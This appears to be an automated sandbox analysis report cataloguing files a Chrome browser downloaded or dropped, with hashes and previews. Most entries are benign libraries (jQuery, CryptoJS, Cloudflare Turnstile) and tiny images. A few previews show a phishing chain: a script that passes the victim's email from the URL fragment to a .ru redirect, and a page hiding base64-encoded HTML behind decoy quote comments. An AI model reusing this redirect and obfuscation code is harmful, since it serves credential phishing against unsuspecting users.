                                                                                                        Preview:L..................F.@.. ...$+.,.......^...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDYYi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYhi....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDYhi....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDYhi..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDYii...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s4b}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 12:11:17 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2679
                                                                                                        Entropy (8bit):3.9829142504746438
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8ldusTjDiH5idAKZdA1duTeehOuTbbiZUk5OjqehOuTbYy+yT+:8zbhTfTbxWOvTbYy7T
                                                                                                        MD5:7419DC15BF4CD22FEFD2D9D0726F244B
                                                                                                        SHA1:6BC07A97E54ABA246C38D6B7A963F9689DE326F6
                                                                                                        SHA-256:8080EB4F7BF327219C0788B56106C40AFDC64EB1FD9F3B94CC9C96547F5679B2
                                                                                                        SHA-512:14B5FC6AAE20E8F839AD596BF89617FA982EF0FFFADAF1F5D1D2FD642EFF481CD8E254A3FBCFC1D42EEB77EF20E0A914C3CB08C704C7CC4FB4519634A5CF7A9B
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,........^...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDYYi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYhi....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDYhi....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDYhi..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDYii...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s4b}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):48316
                                                                                                        Entropy (8bit):5.6346993394709
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                        Malicious:false
                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):3.990210155325004
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):3.990210155325004
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):89501
                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                        Malicious:false
                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (47261)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):47262
                                                                                                        Entropy (8bit):5.3974731018213795
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                        MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                        SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                        SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                        SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                        Malicious:false
                                                                                                        Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):3.990210155325004
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:HTML document, ASCII text
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):204
                                                                                                        Entropy (8bit):4.9486021884354985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:gH//IGeFy0O3QWw2GHFFF5XEC/Fc/LX8EXYQ1CId/oROkADFoCDRcGIFTAXXTlU2:Ha2pvHF/KRLhlC2/oxmmuc3WdNdb
                                                                                                        MD5:5C3DF15C7C7D45E9D2FB9ADFD2BF829E
                                                                                                        SHA1:AA60877F59521AADAD140CBD0412229C661E274A
                                                                                                        SHA-256:2AE0F298E38CD5131A316353A4EB87D8EA8491182DC9C0B4C8062DC284FBD230
                                                                                                        SHA-512:D413C95845C511FD0636832AB9AA6245C036F9C2273A85A71EA45A2F10DDA0C4804BF7A1E194CA774B4BC5CEF9864FB8249B5919F199CCE21B86078180398C3D
                                                                                                        Malicious:false
                                                                                                        URL:https://hollandco.athrikasih.com/cloudflare-antibot/
                                                                                                        Preview:<script>. var fragment = window.location.hash.substring(1);. fragment = fragment.replace(/\+/g, '@');. window.location.href = 'https://9wETjDA.niavereinho.ru/QTnArt4/#D' + fragment;. </script>
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 77 x 100, 8-bit/color RGB, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):4.068159130770307
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPl4hT8lHxl/k4E08up:6v/lhPmWlH7Tp
                                                                                                        MD5:52BDF1682A03D42B87CA5FC313B80556
                                                                                                        SHA1:1937B8046FD9A6717748EBD2B02D8B5EA47DFF0C
                                                                                                        SHA-256:147D0544F8B8893DC5FE3EB7CE798991D19988DC8D47B397BC46BC61A7EE1DAE
                                                                                                        SHA-512:9A6701CF40B241496B91B9AF8CBFE86597CAE815EABAB82B129A1CD2445373F7FFD5ADF0A2C5758F35E8CB2F479B750050E74895D74AA5BB255CBBAEDCF13E1B
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cd56adf1e4c7ce7/1728047484359/cSCIqWMfG6sfcGK
                                                                                                        Preview:.PNG........IHDR...M...d.....L.*.....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:very short file (no magic)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):1
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:U:U
                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                        Malicious:false
                                                                                                        URL:https://wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru/rreozoythcvyficrHTcllUWRLKOTPFRJKMWZZBRXQBHXTDTWYQN
                                                                                                        Preview:1
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):48316
                                                                                                        Entropy (8bit):5.6346993394709
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                        Malicious:false
                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (47261)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):47262
                                                                                                        Entropy (8bit):5.3974731018213795
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                        MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                        SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                        SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                        SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                                                                                        Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 65 x 28, 8-bit/color RGB, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):4.002585360278504
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPlM55BllKkxl/k4E08up:6v/lhPqUk7Tp
                                                                                                        MD5:ABC87D75FEB1AE6033DFC1BBD9C3CEA5
                                                                                                        SHA1:24058A3866A568F96FB7C653845474204F31D9C4
                                                                                                        SHA-256:A3147B271E6A5A2545DC91428954900D81DB84244E40D7BA02DC54CD0408CA43
                                                                                                        SHA-512:3E532338EA3BE2A65C3B64A89FB0E9AEAD478D7AB1A2A0D2D5206686DC7967868B53B064D97F480C4A6D09CE00A36375751A14FCDB6CE4C3568D779D1CBEFDE7
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cd56b4bca50423a/1728047501850/dKqrmOItVOoeN4w
                                                                                                        Preview:.PNG........IHDR...A...........E;....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 77 x 100, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):4.068159130770307
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPl4hT8lHxl/k4E08up:6v/lhPmWlH7Tp
                                                                                                        MD5:52BDF1682A03D42B87CA5FC313B80556
                                                                                                        SHA1:1937B8046FD9A6717748EBD2B02D8B5EA47DFF0C
                                                                                                        SHA-256:147D0544F8B8893DC5FE3EB7CE798991D19988DC8D47B397BC46BC61A7EE1DAE
                                                                                                        SHA-512:9A6701CF40B241496B91B9AF8CBFE86597CAE815EABAB82B129A1CD2445373F7FFD5ADF0A2C5758F35E8CB2F479B750050E74895D74AA5BB255CBBAEDCF13E1B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...M...d.....L.*.....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (6477), with CRLF line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):18003
                                                                                                        Entropy (8bit):5.908565329035279
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:vsnu2RQ5Zd4fDVue4/nu2RQ5Zd4fDVue4QlrCBlrg:vaQ5ZimNQ5ZimQlr2lrg
                                                                                                        MD5:60344F64EDC6603665843771A56CA1AE
                                                                                                        SHA1:B2B27DBCC77AC727E1FEFA73807FA36CDD3F2C9B
                                                                                                        SHA-256:4A5DA868F15B46CCB2F679C77EC2E3A4AC67538B0DF1125991563432D869C8C1
                                                                                                        SHA-512:94996B9FB004A6816587319FC8E478EF844024616D5EDE066864DA6269FAE376DDD0C3EEB79C21A10A4A37618429DDEF8106103EA91C77FC9204F208396D7100
                                                                                                        Malicious:false
                                                                                                        URL:https://9wetjda.niavereinho.ru/QTnArt4/
                                                                                                        Preview: Don&#039;t be afraid to give up the good to go for the great. -->.. Success is not final, failure is not fatal: It is the courage to continue that counts. -->..<script>../* Success is not the absence of failure; it&#039;s the persistence through failure. */..if(atob("aHR0cHM6Ly85d0VUakRBLm5pYXZlcmVpbmhvLnJ1L1FUbkFydDQv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9I
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (47261)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):47262
                                                                                                        Entropy (8bit):5.3974731018213795
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                        MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                        SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                        SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                        SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                                                                                        Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):89501
                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                        Malicious:false
                                                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 65 x 28, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
